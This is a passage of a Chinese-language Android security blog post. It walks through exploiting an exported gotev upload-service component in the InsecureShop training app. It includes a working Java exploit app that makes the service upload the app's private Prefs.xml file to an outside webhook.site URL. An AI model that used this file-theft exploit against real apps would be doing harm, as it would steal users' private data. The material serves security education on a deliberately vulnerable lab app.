<p>看起来该应用程序包含一个名为 <code>net.gotev.uploadservice</code> 的易受攻击的上传服务库，并且它在 <code>androidManfiest.xml</code>中被导出了。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;service android:name=<span class="string">&quot;net.gotev.uploadservice.UploadService&quot;</span> android:enabled=<span class="string">&quot;true&quot;</span> android:exported=<span class="string">&quot;true&quot;</span>/&gt;</span><br></pre></td></tr></table></figure>

<p>在HackerOne上有一份公开报告利用了这项服务：</p>
<p>[ HackerOne &gt; On the newest Androids it also can be exploited via Instant Apps directly from a web-browser (installation of an app is not required).It actually was a mistake, services can be accessed by Instant A <a target="_blank" rel="noopener" href="https://hackerone.com/reports/258460]">https://hackerone.com/reports/258460]</a>(<a target="_blank" rel="noopener" href="https://hackerone.com/reports/258460">https://hackerone.com/reports/258460</a> ”<br>HackerOne &gt; On the newest Androids it also can be exploited via Instant Apps directly from a web-browser (installation<br>of an app is not required).It actually was a mistake, services can be accessed by Instant<br>A <a target="_blank" rel="noopener" href="https://hackerone.com/reports/258460%E2%80%9D">https://hackerone.com/reports/258460”</a>)</p>
<p>报告中提到，由于该服务被导出，它允许安装在同一设备上的任何应用程序使用它来从易受攻击的应用程序目录中窃取任何文件，在我们的情况下是<br><code>/data/data/com.insecureshop</code>。我将创建一个新的漏洞利用应用程序，并将易受攻击的库代码添加到我的漏洞利用应用程序中。以下是在Insecureapp中使用的易受攻击版本<br><code>android-upload-service-3.2.3</code>的链接：</p>
<p><a target="_blank" rel="noopener" href="https://github.com/gotev/android-upload-service/releases?page=4">https://github.com/gotev/android-upload-service/releases?page=4</a></p>
<p>首先，你需要通过编辑 settings.gradle 文件并将依赖项添加到 build.gradle 文件中，将这个库导入到你的代码中：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">dependencyResolutionManagement &#123;</span><br><span class="line">repositoriesMode.set(RepositoriesMode.FAIL_ON_PROJECT_REPOS)</span><br><span class="line">repositories &#123;</span><br><span class="line">    google()</span><br><span class="line">    mavenCentral()</span><br><span class="line">    maven &#123; url <span class="string">&#x27;https://jitpack.io&#x27;</span> &#125;</span><br><span class="line">    jcenter() <span class="comment">// Warning: this repository is going to shut down soon</span></span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">rootProject.name = <span class="string">&quot;gotevUploadServiceExploit&quot;</span></span><br><span class="line">include <span class="string">&#x27;:app&#x27;</span>```</span><br><span class="line"></span><br><span class="line">```java</span><br><span class="line">dependencies</span><br><span class="line">&#123;</span><br><span class="line">    implementation <span class="string">&#x27;com.github.gotev.android-upload-service:uploadservice:3.2.3&#x27;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>最后，点击同步Gradle，然后修改Hackerone研究人员提供的POC，尝试窃取<code>Prefs.xml</code>文件：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">package</span> com.insecureshopapp.gotevuploadserviceexploit;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> android.app.Activity;</span><br><span class="line"><span class="keyword">import</span> android.content.Intent;</span><br><span class="line"><span class="keyword">import</span> android.os.Bundle;</span><br><span class="line"><span class="keyword">import</span> java.io.FileNotFoundException;</span><br><span class="line"><span class="keyword">import</span> net.gotev.uploadservice.HttpUploadTaskParameters;</span><br><span class="line"><span class="keyword">import</span> net.gotev.uploadservice.UploadFile;</span><br><span class="line"><span class="keyword">import</span> net.gotev.uploadservice.UploadTaskParameters;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">MainActivity</span> <span class="keyword">extends</span> <span class="title class_">Activity</span> &#123;</span><br><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title function_">onCreate</span><span class="params">(Bundle savedInstanceState)</span> &#123;</span><br><span class="line">    <span class="built_in">super</span>.onCreate(savedInstanceState);</span><br><span class="line">    setContentView(R.layout.activity_main);</span><br><span class="line"></span><br><span class="line">    <span class="type">UploadTaskParameters</span> <span class="variable">params</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">UploadTaskParameters</span>();</span><br><span class="line">    <span class="comment">// Random Id parameter</span></span><br><span class="line">    params.setId(<span class="string">&quot;18888998&quot;</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// Any Server URL to receive the local file</span></span><br><span class="line">    params.setServerUrl(<span class="string">&quot;http://webhook.site/4f08c75a-a478-4f6f-93bb-2ee8eba6fa4b&quot;</span>);</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        params.addFile(<span class="keyword">new</span> <span class="title class_">UploadFile</span>(<span class="string">&quot;/data/data/com.insecureshop/shared_prefs/Prefs.xml&quot;</span>));</span><br><span class="line">        <span class="type">Intent</span> <span class="variable">intent</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Intent</span>(<span class="string">&quot;net.gotev.uploadservice.action.upload&quot;</span>);</span><br><span class="line">        intent.setClassName(<span class="string">&quot;com.insecureshop&quot;</span>, <span class="string">&quot;net.gotev.uploadservice.UploadService&quot;</span>);</span><br><span class="line">        intent.putExtra(<span class="string">&quot;taskClass&quot;</span>, <span class="string">&quot;net.gotev.uploadservice.MultipartUploadTask&quot;</span>);</span><br><span class="line">        intent.putExtra(<span class="string">&quot;multipartUtf8Charset&quot;</span>, <span class="literal">true</span>);</span><br><span class="line">        intent.putExtra(<span class="string">&quot;httpTaskParameters&quot;</span>, <span class="keyword">new</span> <span class="title class_">HttpUploadTaskParameters</span>());</span><br><span class="line">        intent.putExtra(<span class="string">&quot;taskParameters&quot;</span>, params);</span><br><span class="line">        startService(intent);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (FileNotFoundException e) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">IllegalStateException</span>(e);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
  </div>
</article>


    <div class="blog-post-comments">
        <div id="utterances_thread">
            <noscript>加载评论需要在浏览器启用 JavaScript 脚本支持。</noscript>
        </div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/intbjw">项目</a></li>
        
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%A1%AC%E7%BC%96%E7%A0%81%E5%87%AD%E8%AF%81"><span class="toc-number">1.</span> <span class="toc-text">硬编码凭证</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#URL%E9%AA%8C%E8%AF%81%E4%B8%8D%E8%B6%B3"><span class="toc-number">2.</span> <span class="toc-text">URL验证不足</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E9%AA%8C%E8%AF%81%E5%BC%B1%E6%A3%80%E6%9F%A5"><span class="toc-number">3.</span> <span class="toc-text">主机验证弱检查</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C"><span class="toc-number">4.</span> <span class="toc-text">任意代码执行</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AE%BF%E9%97%AE%E5%8F%97%E4%BF%9D%E6%8A%A4%E7%9A%84%E7%BB%84%E4%BB%B6"><span class="toc-number">5.</span> <span class="toc-text">访问受保护的组件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E7%AA%83%E5%8F%96"><span class="toc-number">6.</span> <span class="toc-text">任意文件窃取</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8%E5%85%B7%E6%9C%89%E5%B7%B2%E7%9F%A5%E6%BC%8F%E6%B4%9E%E7%9A%84%E7%BB%84%E4%BB%B6"><span class="toc-number">7.</span> <span class="toc-text">使用具有已知漏洞的组件</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&text=安卓APP漏洞学习（上）"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&title=安卓APP漏洞学习（上）"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&is_video=false&description=安卓APP漏洞学习（上）"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=安卓APP漏洞学习（上）&body=Check out this article: https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&title=安卓APP漏洞学习（上）"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&title=安卓APP漏洞学习（上）"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&title=安卓APP漏洞学习（上）"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&title=安卓APP漏洞学习（上）"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&name=安卓APP漏洞学习（上）&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://intbjw.github.io/2025/01/22/%E5%AE%89%E5%8D%93APP%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%EF%BC%88%E4%B8%8A%EF%BC%89%20/&t=安卓APP漏洞学习（上）"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020-2025
    intBJW
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/intbjw">项目</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

  <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?0ae94ec1b308edd27e5393ae9c49cd4e";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
        </script>

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

    <script type="text/javascript">
      var utterances_repo = 'intbjw/intbjw.github.io';
      var utterances_issue_term = 'pathname';
      var utterances_label = 'Comment';
      var utterances_theme = 'github-dark';

      (function(){
          var script = document.createElement('script');

          script.src = 'https://utteranc.es/client.js';
          script.setAttribute('repo', utterances_repo);
          script.setAttribute('issue-term', 'pathname');
          script.setAttribute('label', utterances_label);
          script.setAttribute('theme', utterances_theme);
          script.setAttribute('crossorigin', 'anonymous');
          script.async = true;
          (document.getElementById('utterances_thread')).appendChild(script);
      }());
  </script>

</body>
</html>
